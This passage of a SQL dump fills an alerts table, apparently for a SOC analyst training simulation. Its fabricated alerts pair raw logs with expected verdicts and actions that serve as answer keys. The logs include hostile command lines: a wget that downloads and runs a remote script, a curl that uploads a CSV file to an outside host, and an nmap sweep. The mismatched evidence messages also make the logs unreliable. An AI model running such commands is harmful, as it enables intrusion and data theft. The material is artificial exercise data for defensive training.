detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T03:45:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"internal-host-01\\\",\\\"command_line\\\":\\\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T03:45:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"internal-host-01\\\",\\\"command_line\\\":\\\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T03:45:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"internal-host-01\\\",\\\"command_line\\\":\\\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T03:45:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"internal-host-01\\\",\\\"command_line\\\":\\\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh 
&& bash /tmp/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T03:45:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"internal-host-01\\\",\\\"command_line\\\":\\\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1262, 'Brute Force Attack Detected on External Facing Service', 'critical', 'FTK', 'Multiple failed login attempts detected from an external IP address, indicating a brute force attack. The source IP has been reported for similar activities.', 'Brute Force', 'T1078', 1, 'closed', NULL, '{\"timestamp\":\"2026-02-14T10:15:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.5\",\"username\":\"admin\",\"hostname\":\"web-server-01\",\"failed_attempts\":\"25\"}', '2026-02-14 17:39:26', '2026-02-15 12:47:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Common administrative username targeted in attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed attempts and malicious history of the IP address confirm a brute force attack.\"}', 'Beginner', 'IR', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.751Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.751Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.751Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.751Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.751Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1263, 'Data Exfiltration via Unauthorized Cloud Storage Access', 'critical', 'Netskope', 'An internal machine attempted to upload sensitive PII data to an unauthorized cloud storage service. The activity was detected through abnormal outbound data transfer patterns.', 'Data Exfil', 'T1567', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-23T23:45:12Z\",\"event_type\":\"data_upload\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.56\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAPTOP-01\",\"request_body\":\"Base64 encoded payload of the file\",\"command_line\":\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\"}', '2026-02-24 03:10:37', '2026-02-27 06:50:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the user\'s machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for unauthorized data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"Base64 encoded payload of the file\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected sensitive data exfiltration attempt\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The IP and payload indicate a clear attempt to exfiltrate data to an unauthorized service.\"}', 'Intermediate', 'DLP', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.701Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid 
user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-23T23:45:12Z\\\",\\\"event_type\\\":\\\"data_upload\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"request_body\\\":\\\"Base64 encoded payload of the file\\\",\\\"command_line\\\":\\\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.701Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-23T23:45:12Z\\\",\\\"event_type\\\":\\\"data_upload\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"request_body\\\":\\\"Base64 encoded payload of the file\\\",\\\"command_line\\\":\\\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.701Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-23T23:45:12Z\\\",\\\"event_type\\\":\\\"data_upload\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"request_body\\\":\\\"Base64 encoded payload of the file\\\",\\\"command_line\\\":\\\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.701Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user 
admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-23T23:45:12Z\\\",\\\"event_type\\\":\\\"data_upload\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"request_body\\\":\\\"Base64 encoded payload of the file\\\",\\\"command_line\\\":\\\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.701Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-23T23:45:12Z\\\",\\\"event_type\\\":\\\"data_upload\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"request_body\\\":\\\"Base64 encoded payload of the file\\\",\\\"command_line\\\":\\\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1264, 'Unauthorized Access Attempt on Sensitive Database Detected', 'high', 'Microsoft Purview', 'Multiple failed login attempts were detected on a sensitive database server from an internal IP. The pattern suggests a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-02-24T03:12:34Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.100\",\"username\":\"admin\",\"hostname\":\"DB-SERVER-01\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address potentially compromised\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Target database server IP\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The pattern of login failures indicates a brute force attempt on the database server.\"}', 'Intermediate', 'DLP', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.706Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DB-SERVER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.706Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DB-SERVER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.706Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DB-SERVER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.706Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DB-SERVER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.706Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DB-SERVER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1265, 'Suspicious Email with Potential Phishing Link Detected', 'medium', 'Symantec DLP', 'An email containing a suspicious link was received by an employee. The link points to a site known for phishing activities.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T10:15:20Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.24\",\"dst_ip\":\"192.168.1.20\",\"username\":\"susan.smith\",\"hostname\":\"CORP-EMAIL-02\",\"email_sender\":\"noreply@phishingdomain.com\",\"url\":\"http://phishing-link.com/login\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing activities\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"noreply@phishingdomain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email domain known for phishing attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a known phishing site, posing a threat to credential security.\"}', 'Intermediate', 'DLP', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.707Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:20Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.24\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"susan.smith\\\",\\\"hostname\\\":\\\"CORP-EMAIL-02\\\",\\\"email_sender\\\":\\\"noreply@phishingdomain.com\\\",\\\"url\\\":\\\"http://phishing-link.com/login\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.707Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:20Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.24\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"susan.smith\\\",\\\"hostname\\\":\\\"CORP-EMAIL-02\\\",\\\"email_sender\\\":\\\"noreply@phishingdomain.com\\\",\\\"url\\\":\\\"http://phishing-link.com/login\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.707Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:20Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.24\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"susan.smith\\\",\\\"hostname\\\":\\\"CORP-EMAIL-02\\\",\\\"email_sender\\\":\\\"noreply@phishingdomain.com\\\",\\\"url\\\":\\\"http://phishing-link.com/login\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.707Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:20Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.24\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"susan.smith\\\",\\\"hostname\\\":\\\"CORP-EMAIL-02\\\",\\\"email_sender\\\":\\\"noreply@phishingdomain.com\\\",\\\"url\\\":\\\"http://phishing-link.com/login\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.707Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:20Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.24\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"susan.smith\\\",\\\"hostname\\\":\\\"CORP-EMAIL-02\\\",\\\"email_sender\\\":\\\"noreply@phishingdomain.com\\\",\\\"url\\\":\\\"http://phishing-link.com/login\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1266, 'Internal Reconnaissance Detected via Network Scanning', 'high', 'Symantec DLP', 'Unusual network scanning activity was detected from an internal IP address, indicating potential reconnaissance efforts.', 'Lateral Movement', 'T1046', 0, 'Closed', 225, '{\"timestamp\":\"2026-02-24T08:45:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.45\",\"dst_ip\":\"192.168.3.1\",\"username\":\"unknown\",\"hostname\":\"CORP-SCAN-01\",\"request_body\":null,\"command_line\":\"nmap -sP 192.168.3.0/24\"}', '2026-02-24 03:10:37', '2026-03-07 11:57:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP conducting reconnaissance\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sP 192.168.3.0/24\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command used for network scanning\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of an internal IP and network scanning tools suggests reconnaissance activity.\"}', 'Intermediate', 'DLP', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.1\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-SCAN-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nmap -sP 
192.168.3.0/24\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.1\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-SCAN-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nmap -sP 192.168.3.0/24\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.1\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-SCAN-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nmap -sP 192.168.3.0/24\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.1\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-SCAN-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nmap -sP 192.168.3.0/24\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.1\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-SCAN-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nmap -sP 192.168.3.0/24\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
